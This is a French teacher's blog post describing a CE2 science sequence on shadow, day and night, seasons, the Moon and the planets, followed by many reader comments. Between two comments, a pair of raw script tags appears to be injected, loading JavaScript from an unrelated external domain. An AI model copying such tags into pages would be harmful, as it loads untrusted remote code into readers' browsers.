• CE2 Soleil, Terre, Lune, planètes...


    CE2 Soleil, Terre, Lune, planètes...Je termine à l'instant la préparation d'une séquence de sciences pour un gros groupe de CE2. J'ai beaucoup d'élèves (vraiment beaucoup) et seulement 6 séances d'une (petite) heure. J'ai donc choisi une séquence assez simple, plutôt "culturelle", avec seulement des manipulations sur "ombre et lumière" en début de séquence + la fabrication d'un "modèle" en cours de séquence.

    1. Je démarre par deux séances pas superflues du tout sur l'ombre. Nous avons fait des manipulations avec une lampe de poche et un playmobil. Comment faire pour que l'ombre soit dans telle direction ? Où placer la lampe pour que l'ombre soit grande ? petite ?

    2. J'enchaine ensuite sur une séance sur "Pourquoi il y a des jours et des nuits" (le soleil, la terre qui tourne sur elle-même...)

    3. Puis sur une séance sur les saisons (La Terre tourne autour du soleil, l'axe est penché, ouille ouille, ça va être dur, je ne m'attarde pas.)

    4. Ensuite une séance sur la Lune, où on se resservira encore de notre travail sur les ombres.

    5. Et pour finir une petite présentation des 8 planètes du système solaire.

    Le document-élève est là, avec, en fin de document, les traces écrites sans trous :

    CE2 Soleil, Terre, Lune, planètes...

    CE2 Soleil, Terre, Lune, planètes...Enfin, en cours de séance 4 et 5, nous fabriquerons quelque chose qui ressemblera à ce modèle (où le soleil sera fixe sur une feuille de fond) qui, je trouve, permettra de fixer un peu les idées sur:
    - la Terre tourne autour du soleil
    - la Terre tourne sur elle-même
    - la Lune tourne autour de la Terre en lui montrant toujours la même face.

    CE2 Soleil, Terre, Lune, planètes...

     

     

     

     

     

     


    Mise à jour mai 2015 :

    CE2 Soleil, Terre, Lune, planètes...Sur le site de Canopé (Les Fondamentaux) on trouve une dizaine d'animations destinées à des élèves d'élémentaire pour aborder ce point du programme. Elles sont très bien faites. Courez ! (clic)

     

     


    Pour des CE2, en sciences, vous serez peut-être aussi intéressés par l'article : séquence régimes alimentaires et chaines alimentaires.

    « Equipement de la classe : AveryTrouvaille #11 : Lancer des dés silencieux »
    Pin It

    Tags Tags : , , , , , , , , , , ,
  • Commentaires

    1
    furansujin
    Mercredi 31 Octobre 2012 à 19:31

    J'adore l'idée de la maquette !

    Merci beaucoup et à bientôt !

    2
    denisb
    Mercredi 31 Octobre 2012 à 19:42

    Merci pour cet article

    "- la Lune tourne autour de la Terre mais pas sur elle-même."

    Si, la Lune tourne sur elle-même, elle effectue un tour pendant qu'elle fait le tour de la Terre, c'est pour cela qu'on voit toujours la même face.

    3
    Mercredi 31 Octobre 2012 à 19:45

    rah oui, tu as raison. Bon, c'était ça que je voulais dire : on colle la Lune, on ne la met pas sur attache parisienne, et on explique qu'elle montre toujours sa même face à la Terre. Je vais tacher de corriger l'article.

    4
    Aphikyt Profil de Aphikyt
    Mercredi 31 Octobre 2012 à 19:46

    Coucou

    juste une petite info: la Lune tourne sur elle-même. Mais comme elle tourne sur elle-même au même rythme qu'elle tourne autour de la Terre, on voit toujours la même face.

    5
    denisb
    Mercredi 31 Octobre 2012 à 19:48

    Je comprends. Ton idée de maquette est sympa, je vais voir comment l'adapter pour ma classe astronomie.

    6
    chouchoudu14
    Mercredi 31 Octobre 2012 à 23:16

    j'adore la maquette ! enfin quelque chose de simple et facile à réaliser ! un grand merci !

     

    7
    Mitzy 67
    Jeudi 1er Novembre 2012 à 09:51

    Un grand merci pour cet article. J'aime beaucoup l'idée de la maquette. Je vais essayer de la réaliser avec ma classe.    Génial !! 

    8
    Belding
    Jeudi 1er Novembre 2012 à 10:16

    Waouh, je viens de terminer la partie ombre et lumières avec mes CE2 et je commençais à réfléchir sur la suite (mouvement des planètes...). Merci, ton travail va beaucoup m'inspirer !

    9
    Ouba37
    Jeudi 1er Novembre 2012 à 11:15

    Merci bcp pour ces documents, cela tombe merveilleusement bien....

    Attention, petite coquille (toute petite) dans la page sur la lune, "la lune ne tourne pas autour..." Tu as juste oublié la seconde partie de la négation. 

    J'apprécie sincèrement ton travail et je m'en sers régulièrement. Un grand merci !

    10
    qat Profil de qat
    Jeudi 1er Novembre 2012 à 12:01

    super séquence, merci beaucoup... c'était un de mes projets des vacances de me pencher sur le sujet... j'ai bien fait de me pencher d'abord sur l'ordi...merci merci merci

    11
    Emilie maitresse
    Jeudi 1er Novembre 2012 à 18:06

    Encore un petit tout sur ton site alors j'en profite pour laisser un message, ton travail est vraiment remarquable, trucs et astuces en tout genre, séqeunce bien ficelée, je trouve ton site vraiment bien fait, clair et très agréable ! C'est pour moi le meilleur du web !! Merci pour tout ce que tu partages, bonnes vacances ! 

    12
    clau34
    Jeudi 1er Novembre 2012 à 18:48

    très bel article. Merci

    13
    UnkleDark
    Vendredi 2 Novembre 2012 à 10:32
    UnkleDark

    Pour la face cachée de la lune, je me suis aidé de l'émission c'est pas sorcier. Je vais voir à réinvestir ça avec eette forme plane. MERCI !!

    http://www.youtube.com/watch?v=GwBhbC9tBko

    14
    Grozeille
    Vendredi 2 Novembre 2012 à 13:02

    J'adore la démarche! Merci du partage... encore une fois! ;o)

    15
    1976 verts
    Samedi 3 Novembre 2012 à 14:43

    Génial, l'idée de la maquette est super!

    Merci.

    16
    wendyss
    Mercredi 7 Novembre 2012 à 18:54

    Bonjour, j'aurais aimé savoir si, comme tu parles de"séquence", tu avais aussi une fiche de préparation avec ces documents ou non (je ne la trouve pas, mais je sais que beaucoup de séquence en ont, alors je demande au cas où ) Merci pour tout ce merveilleux travail!!

    <script src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded" type="text/javascript"></script> <script src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded" type="text/javascript"></script>
    17
    Mercredi 7 Novembre 2012 à 20:03
    Beh non ...
    18
    winnaurelie
    Dimanche 20 Janvier 2013 à 10:00

    Bonjour, super séquence, mes loulous ont super adhéré, en particulier pour la construction de la maquette. C'était génial. J'en arrive maintenant à la construction de mon évaluation et je dois dire que je bloque un peu, avec la trame que j'ai faite, j'en suis à 5 pages car je voudrais tout évaluer! Toi, ton évaluation était longue? D'avance merci.

    19
    winnaurelie
    Mercredi 23 Janvier 2013 à 09:47

    Ah oui, tiens, pourquoi pas...Je vais revoir tout ça. Merci beaucoup!

     

    20
    Tibfellow
    Dimanche 28 Avril 2013 à 22:23

    La séquence a été très appréciée par mes élèves. Ils débordaient de questions et je n'avais pas toujours les réponses. Nous avons fait quelques recherches supplémentaires et visionner un "c'est pas sorcier" pour compléter.

    Les résultats du QCM ont été un peu décevants. J'avais bien précisé qu'en cas de doute il était possible de ne pas répondre et d'éviter ainsi de perdre des points, mais ils ont tous répondu systématiquement. Certains ont perdu beaucoup de points.

    Le QCM peut être une bonne chose car les élèves n'ont pas à restituer la leçon à partir de rien, il permet aux élèves qui hésitent d'avoir une aide. Mais à la prochaine tentative j'éviterais les points négaitfs.

    Que cela ne te fasse pas douter de la qualité de ton travail. Merci encore ! ;-)

    21
    kirikouzouzou
    Jeudi 6 Juin 2013 à 20:47

    Bonsoir, je voulais savoir si une eval etit disponible sur cette lecon. Ton travail est tellement excellent.

    Merci d'avance.

    22
    yvain
    Lundi 23 Septembre 2013 à 17:19
    yvain

    Bonjour et merci pour cette super séquence que tu acceptes de partager avec nous, c'est ce que je cherchais.


     


    La seule petite remarque est la coquille signalée par Ouba37, tu as oublié le pas dans la phrase:Elle ne produit de lumière mais elle est éclairée par le soleil. (cela prouve que ça arrive même aux meilleures)


     


     


     


    Un grand merci à toi!!!

    23
    karibouh
    Dimanche 29 Septembre 2013 à 16:07

    bonjour,

    super séquence je vais tester dès demain je suis sûre que la maquette leur plaira !

    peux tu m'envoyer ton qcm ?

    merci

    24
    Fabb13
    Mercredi 2 Octobre 2013 à 14:35

    peu original mon commentaire mais en effet la maquette est super : simple, facile à réaliser, et très parlante pour les néophites que nous sommes (mes élèves de CE2 et moi)

    merci!

    25
    sundia35
    Vendredi 1er Novembre 2013 à 22:49

    Bonjour, Bravo pour ce merveilleux travail qui a beaucoup plu à mes élèves. Je suis en train de préparer l'évaluation et je viens de tomber sur un lien épatant que je découvre malheureusement un peu tard mais j'ai pensé qu'il fallait partager cette trouvaille. Allez-y c'est vraiment très bien fait!  tapez "saisons c brossard " dans votre barre de recherche.

    Merci !

    26
    Isa20
    Dimanche 10 Novembre 2013 à 15:48

    Bravo pour ce superbe travail qui,  j'en suis sûre, servira à bon nombre d'entre nous ! J'ai testé , c'est génial . Les enfants ont adoré fabriquer la maquette. Pourrais tu m'envoyer le Qcm afin d'évaluer mes élèves ?? D'avance merci

     

    27
    Flow
    Samedi 18 Janvier 2014 à 17:03

    Bonjour,


    Ta séquence m'intéresse mais j'aurais souhaité savoir si tu avais une fiche de prép pour que je visualise ta séquence de façon plus détaillée....


    Merci !!

    28
    anneso-maitresse
    Vendredi 7 Mars 2014 à 13:25

    Bonjour

     

    Avant toute chose, merci pour tes preps et tes petits conseils...En temps que PES, on apprécie des sites aussi bien fournis...

    Une petite remarque sur ton doc, dans sur ta première page a retenir il y a "les objets éclairés par une source lumineuse ont deux ombres.". 1 source lumineuse => 1 ombre...Du coup, mime si tu parles des deux appellations (ombre propre et ombre portée), cela ne prête-t-il pas à confusion  ?

    Merci bcp!

     

    29
    Dimanche 23 Mars 2014 à 09:51

    Merci merci merci! J'ai le cycle 3 complet, et les documents que j'avais trouvés pour mes CM me semblait bien complexes pour mes CE2. 

    Tu viens de sauver mon dimanche après-midi!

    30
    Mardi 25 Mars 2014 à 17:55

    Bonjour,

    Ce n'est rien de dire que s'il y a un domaine dans lequel je suis mal à l'aise, c'est bien celui des sciences..L'ombre, n'en parlons pas.

    Donc pourrais-je stp avoir la réponse à ta fiche n° 1: La source de lumière (lampe, soleil...), l'objet et l'ombre sont toujours ...?..".

    Merci

    31
    Mardi 25 Mars 2014 à 17:58

    alignés ?

    32
    Meni
    Mercredi 30 Juillet 2014 à 14:26

    Merci beaucoup pour ton dossier. C'est droit ce que je cherchais. smile

    33
    Wil
    Jeudi 2 Octobre 2014 à 07:15

    Bonjour,


    La Lune effectue une libration


     http://fr.wikipedia.org/wiki/Libration


    Bonne journée à vous

    34
    Eilice
    Dimanche 2 Novembre 2014 à 12:09

    Géniale cette séquence, claire et parlante.


    Un grand merci! :)

    35
    Sabine
    Jeudi 13 Novembre 2014 à 16:27

    bonjour, bravo pour ton travail ! J'admire vraiment.... avoir le temps de faire et de mettre à disposition par dessus le marché !


    Pourrais-tu m'envoyer ton QCM d'évaluation ?


     


    Merci beaucoup ! Bonne continuation

    36
    Chantal57
    Lundi 24 Novembre 2014 à 20:24

    Bonsoir,


    Après ce superbe travail qui a très bien marché en classe, pourrais-tu me faire parvenir le QCM d'évaluation ?


    Avec tous mes remerciements pour tout ce travail mis à disposition ! smile

    37
    alexandra
    Mercredi 26 Novembre 2014 à 18:56

    bonsoir


    Merci pour ce travail remarquable ! Mais où trouves-tu le temps de faire tout ça??


    Ton travail a très bien fonctionné dans ma classe de CE2 ...merci :-) Aurais tu l'évaluation qui va avec please??? D'avance, un grand merci

    38
    Anna
    Samedi 21 Mars 2015 à 22:20

    Bonjour,


    je me suis bien inspiré de tes documents pour aborder le système solaire avant la fameuse éclipse... Merci, avec un travail concis mais précis comme celui-là, on avance bien.


    Pour conclure, j'utiliserai bien ton QCM d'évaluation. Est-ce que tu aurais  le temps de me l'envoyer ? Merci beaucoup.

    39
    mimie 21
    Dimanche 29 Mars 2015 à 20:03

    Bonjour,

    Tes séquences sont vraiment très intéressantes et clé en main , en grand merci pour ça.

    Je vois que certains commentaires parlent d'une évaluation sur cette séquence de sciences. je suis  bien intéressé pour l'avoir aussi , si cela est possible de me l'envoyer.

    En te remerciant encore

    40
    emmanuelle
    Samedi 5 Septembre 2015 à 15:12

    Bonjour,


    merci pour ce magnifique travail. Je vais le combiner avec un travail que j'ai trouvé sur un site académique educ47...je-sais-plus-quoi- module sciences.


    Pourrais-tu me dire avec quoi tu as fabriqué ta maquette?


    une assiette (jusque là je suis)


    attaches parisiennes


    une bande de papier pour relier le soleil et la terre (matière?)


    la terre et la lune sont découpées dans le même morceau de papier ?


     


    Je suis pas bricoleuse du tout !!!!!!!


    Ils en avaient fait une chacun ???

    41
    annouchka78
    Dimanche 6 Décembre 2015 à 22:25

    Bonjour, séquence super, comme toujours sur ton site. Je vais essayer la maquette cette année et j'ai eu l'idée d'ajouter un morceau de calque colorié moitié jaune/moitié gris par dessus la terre et la lune,  pour simuler le jour et la nuit. On peut fixer celui de la terre avec un bout de scotch à la tige qui la relie au soleil, comme ça la partie jaune du calque reste face au soleil (et on fait tourner la terre par en dessous, je ne sais pas si je suis claire ?) Pour la lune, pas moyen de fixer mais je vais dire au élèves que le calque doit rester toujours dans la même orientation que celui de la terre.....

    Pourrais je avoir aussi ton évaluation si tu l'as ? Merci d'avance.

    42
    Maelle
    Mardi 5 Janvier à 22:36

    Comme toujours, voilà un travail remarquable. Bravo et merci pour le partage des documents. La maquette semble très intéressante à réaliser, c'est une super idée.

    43
    Grenadine
    Mercredi 9 Mars à 21:30

    Super ! Je viens de faire l'intégralité de cette leçon, je l'ai complétée avec beaucoup de manipulations (de globe terrestre et lampe de poche notamment pour les phases de la lune) et je leur ai montré un "C'est pas sorcier" sur ce sujet... Ils ont adoré et en redemandent !! 

     

    Merci pour ce partage et ta générosité !!

     

    Pourrais-tu m’envoyer l’évaluation ?

    (Je t’avais envoyé un mail mais il a dû être classé dans les « indésirables »)

     

    Merci et très bonne continuation

    44
    charlotte
    Jeudi 7 Avril à 10:58

    Bonjour

    Tout d'abord, un grand bravo pour le travail effectué. Les élèves ont adoré et la maquette réalisée est très claire.

    Serait-il possible d'avoir par mail l'évaluation correspondant à cette séquence stp?

    Encore merci.

    45
    cathy
    Dimanche 1er Mai à 16:13

    Bravo pour ce magnifique travail, mes élèves adorent !

    Pourrais tu me faire parvenir ton évaluation s'il te plait ?

    Merci d'avance

    46
    Amél
    Samedi 7 Mai à 10:39

    Bonjour et merci pour cette superbe séquence très appréciée des enfants.*

    Pourrais-tu m'envoyer le QCM afin de pouvoir évaluer les enfants ?

     

    Merci

    Amély

    47
    Dimanche 4 Septembre à 12:28

    Merci beaucoup pour cette super séquence !! Bonne rentrée Charivari !

    smile

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :